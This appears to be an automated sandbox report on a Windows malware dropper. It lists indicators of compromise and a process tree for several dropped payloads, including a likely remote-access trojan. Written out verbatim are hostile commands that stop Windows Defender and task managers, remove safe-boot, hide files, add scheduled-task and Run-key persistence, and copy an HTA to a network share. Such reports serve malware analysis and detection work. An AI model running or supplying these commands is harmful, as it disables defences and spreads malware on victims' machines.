Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3180 VLC1.EXE Token: SeSecurityPrivilege 3180 VLC1.EXE Token: SeTakeOwnershipPrivilege 3180 VLC1.EXE Token: SeLoadDriverPrivilege 3180 VLC1.EXE Token: SeSystemProfilePrivilege 3180 VLC1.EXE Token: SeSystemtimePrivilege 3180 VLC1.EXE Token: SeProfSingleProcessPrivilege 3180 VLC1.EXE Token: SeIncBasePriorityPrivilege 3180 VLC1.EXE Token: SeCreatePagefilePrivilege 3180 VLC1.EXE Token: SeBackupPrivilege 3180 VLC1.EXE Token: SeRestorePrivilege 3180 VLC1.EXE Token: SeShutdownPrivilege 3180 VLC1.EXE Token: SeDebugPrivilege 3180 VLC1.EXE Token: SeSystemEnvironmentPrivilege 3180 VLC1.EXE Token: SeChangeNotifyPrivilege 3180 VLC1.EXE Token: SeRemoteShutdownPrivilege 3180 VLC1.EXE Token: SeUndockPrivilege 3180 VLC1.EXE Token: SeManageVolumePrivilege 3180 VLC1.EXE Token: SeImpersonatePrivilege 3180 VLC1.EXE Token: SeCreateGlobalPrivilege 3180 VLC1.EXE Token: 33 3180 VLC1.EXE Token: 34 3180 VLC1.EXE Token: 35 3180 VLC1.EXE Token: 36 3180 VLC1.EXE Token: SeDebugPrivilege 4488 WINDOWS SECURITY NANO.EXE Token: SeIncreaseQuotaPrivilege 1404 msdcsc.exe Token: SeSecurityPrivilege 1404 msdcsc.exe Token: SeTakeOwnershipPrivilege 1404 msdcsc.exe Token: SeLoadDriverPrivilege 1404 msdcsc.exe Token: SeSystemProfilePrivilege 1404 msdcsc.exe Token: SeSystemtimePrivilege 1404 msdcsc.exe Token: SeProfSingleProcessPrivilege 1404 msdcsc.exe Token: SeIncBasePriorityPrivilege 1404 msdcsc.exe Token: SeCreatePagefilePrivilege 1404 msdcsc.exe Token: SeBackupPrivilege 1404 msdcsc.exe Token: SeRestorePrivilege 1404 msdcsc.exe Token: SeShutdownPrivilege 1404 msdcsc.exe Token: SeDebugPrivilege 1404 msdcsc.exe Token: SeSystemEnvironmentPrivilege 1404 msdcsc.exe Token: SeChangeNotifyPrivilege 1404 msdcsc.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeRemoteShutdownPrivilege 1404 msdcsc.exe Token: SeUndockPrivilege 1404 msdcsc.exe Token: SeManageVolumePrivilege 1404 msdcsc.exe Token: SeImpersonatePrivilege 1404 msdcsc.exe Token: SeCreateGlobalPrivilege 1404 msdcsc.exe Token: 33 1404 msdcsc.exe Token: 34 1404 msdcsc.exe Token: 35 1404 msdcsc.exe Token: 36 1404 msdcsc.exe Token: SeIncreaseQuotaPrivilege 4440 msdcsc.exe Token: SeSecurityPrivilege 4440 msdcsc.exe Token: SeTakeOwnershipPrivilege 4440 msdcsc.exe Token: SeLoadDriverPrivilege 4440 msdcsc.exe Token: SeSystemProfilePrivilege 4440 msdcsc.exe Token: SeSystemtimePrivilege 4440 msdcsc.exe Token: SeProfSingleProcessPrivilege 4440 msdcsc.exe Token: SeIncBasePriorityPrivilege 4440 msdcsc.exe Token: SeCreatePagefilePrivilege 4440 msdcsc.exe Token: SeBackupPrivilege 4440 msdcsc.exe Token: SeRestorePrivilege 4440 msdcsc.exe Token: SeShutdownPrivilege 4440 msdcsc.exe Token: SeDebugPrivilege 4440 msdcsc.exe Token: SeSystemEnvironmentPrivilege 4440 msdcsc.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 704 JOKE.EXE 4852 JOKE2.EXE 1404 msdcsc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3116 wrote to memory of 4056 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 86 PID 3116 wrote to memory of 4056 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 86 PID 3116 wrote to memory of 4056 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 86 PID 3116 wrote to memory of 5604 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 3116 wrote to memory of 5604 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 3116 wrote to memory of 5604 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 3116 wrote to memory of 1068 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 88 PID 3116 wrote to memory of 1068 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 88 PID 3116 wrote to memory of 1068 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 88 PID 3116 wrote to memory of 1840 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 3116 wrote to memory of 1840 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 3116 wrote to memory of 1840 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 3116 wrote to memory of 704 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 90 PID 3116 wrote to memory of 704 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 90 PID 3116 wrote to memory of 704 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 90 PID 5604 wrote to memory of 4168 5604 FILE5.EXE 91 PID 5604 wrote to memory of 4168 5604 FILE5.EXE 91 PID 5604 wrote to memory of 4168 5604 FILE5.EXE 91 PID 5604 wrote to memory of 3180 5604 FILE5.EXE 92 PID 5604 wrote to memory of 3180 5604 FILE5.EXE 92 PID 5604 wrote to memory of 3180 5604 FILE5.EXE 92 PID 3116 wrote to memory of 4852 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 159 PID 3116 wrote to memory of 4852 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 159 PID 3116 wrote to memory of 4852 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 159 PID 5604 wrote to memory of 4416 5604 FILE5.EXE 96 PID 5604 wrote to memory of 4416 5604 FILE5.EXE 96 PID 5604 wrote to memory of 4416 5604 FILE5.EXE 96 PID 4056 wrote to memory of 2920 4056 WScript.exe 94 PID 4056 wrote to memory of 2920 4056 WScript.exe 94 PID 4056 wrote to memory of 2920 4056 WScript.exe 94 PID 5604 wrote to memory of 4488 5604 FILE5.EXE 97 PID 5604 wrote to memory of 4488 5604 FILE5.EXE 97 PID 5604 wrote to memory of 4488 5604 FILE5.EXE 97 PID 3116 wrote to memory of 4444 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 95 PID 3116 wrote to memory of 4444 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 95 PID 3116 wrote to memory of 4444 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 95 PID 3116 wrote to memory of 4864 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 99 PID 3116 wrote to memory of 4864 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 99 PID 3116 wrote to memory of 4864 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 99 PID 1068 wrote to memory of 5456 1068 WScript.exe 100 PID 1068 wrote to memory of 5456 1068 WScript.exe 100 PID 1068 wrote to memory of 5456 1068 WScript.exe 100 PID 3116 wrote to memory of 4780 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 101 PID 3116 wrote to memory of 4780 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 101 PID 3116 wrote to memory of 4780 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 101 PID 1840 wrote to memory of 4296 1840 WScript.exe 337 PID 1840 wrote to memory of 4296 1840 WScript.exe 337 PID 1840 wrote to memory of 4296 1840 WScript.exe 337 PID 1068 wrote to memory of 4908 1068 WScript.exe 108 PID 1068 wrote to memory of 4908 1068 WScript.exe 108 PID 1068 wrote to memory of 4908 1068 WScript.exe 108 PID 3116 wrote to memory of 4892 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 107 PID 3116 wrote to memory of 4892 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 107 PID 3116 wrote to memory of 4892 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 107 PID 1068 wrote to memory of 3632 1068 WScript.exe 444 PID 1068 wrote to memory of 3632 1068 WScript.exe 444 PID 1068 wrote to memory of 3632 1068 WScript.exe 444 PID 4864 wrote to memory of 1568 4864 LEGIT_SOFTWARE2.EXE 115 PID 4864 wrote to memory of 1568 4864 LEGIT_SOFTWARE2.EXE 115 PID 1068 wrote to memory of 3136 1068 WScript.exe 445 PID 1068 wrote to memory of 3136 1068 WScript.exe 445 PID 1068 wrote to memory of 3136 1068 WScript.exe 445 PID 3116 wrote to memory of 3700 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 119 PID 3116 wrote to memory of 3700 3116 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 119 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 3696 attrib.exe 2644 attrib.exe 4852 attrib.exe 2540 attrib.exe 4712 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXECUTION.JS"2⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2920
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:4504
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:4832
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2400
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3460
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2968
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5112
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1264
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5820
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2284
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3604
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:312
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1264
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1216
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2420
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5524
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:964
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1120
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1316
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4700
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5952
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4676
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5532
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4956
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4584
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2020
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4804
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1048
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5340
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4296
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1244
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4352
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5248
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5028
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5700
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4716
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5604 -
C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4168
-
-
C:\Program Files (x86)\VLC1.EXE"C:\Program Files (x86)\VLC1.EXE"3⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3180 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)\VLC1.EXE" +s +h4⤵
- System Location Discovery: System Language Discovery
PID:4768 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\VLC1.EXE" +s +h5⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2540
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)" +s +h4⤵PID:2892
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)" +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4852
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad4⤵PID:1268
-
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1404 -
C:\Windows\SysWOW64\notepad.exenotepad5⤵PID:5452
-
-
-
-
C:\Program Files (x86)\WINDOWS DEFENDER.EXE"C:\Program Files (x86)\WINDOWS DEFENDER.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit4⤵PID:4836
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:2280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9DF5.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:5592 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3824
-
-
C:\Users\Admin\AppData\Roaming\csrss.exe"C:\Users\Admin\AppData\Roaming\csrss.exe"5⤵
- Executes dropped EXE
PID:1820
-
-
-
-
C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FINDM10E.VBS"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Windows\Temp\svchost_533423.exe3⤵PID:5456
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Windows\Temp\svchost_533423.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2644
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Service WinDefend -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name taskmgr.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name cmd.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name regedit.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name procexp.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name processhacker.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2408
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /deletevalue {current} safeboot3⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f3⤵PID:5764
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f4⤵
- Modifies registry key
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cipher /e /s:C:\Windows\Temp\3⤵PID:5684
-
C:\Windows\SysWOW64\cipher.execipher /e /s:C:\Windows\Temp\4⤵PID:3444
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe3⤵
- System Location Discovery: System Language Discovery
PID:4128 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4712
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\findme_579518.exe3⤵PID:3524
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INSTALLE10R.VBS"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Public\Documents\winservice_533423.exe3⤵
- System Location Discovery: System Language Discovery
PID:4296 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Public\Documents\winservice_533423.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:704
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4444 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8685.tmp\8686.tmp\8687.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"3⤵
- Modifies registry class
PID:212 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msgbx.vbs"4⤵PID:1640
-
-
C:\Windows\system32\net.exenet stop "WSearch"4⤵PID:1820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WSearch"5⤵PID:3008
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "https://watchfurry4k.com"4⤵
- Modifies Internet Explorer settings
PID:1172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\85D9.tmp\85DA.tmp\85DB.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"3⤵PID:1568
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3100
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:1608
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:2016
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:1700
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4804
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3824
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4608
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5508
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3112
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LOL.VBS"2⤵PID:4780
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sys32.hta \\IDKMAN\C$\Users\Public\sys32.hta3⤵PID:3980
-
-
-
C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"2⤵
- Executes dropped EXE
PID:4892 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2432 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
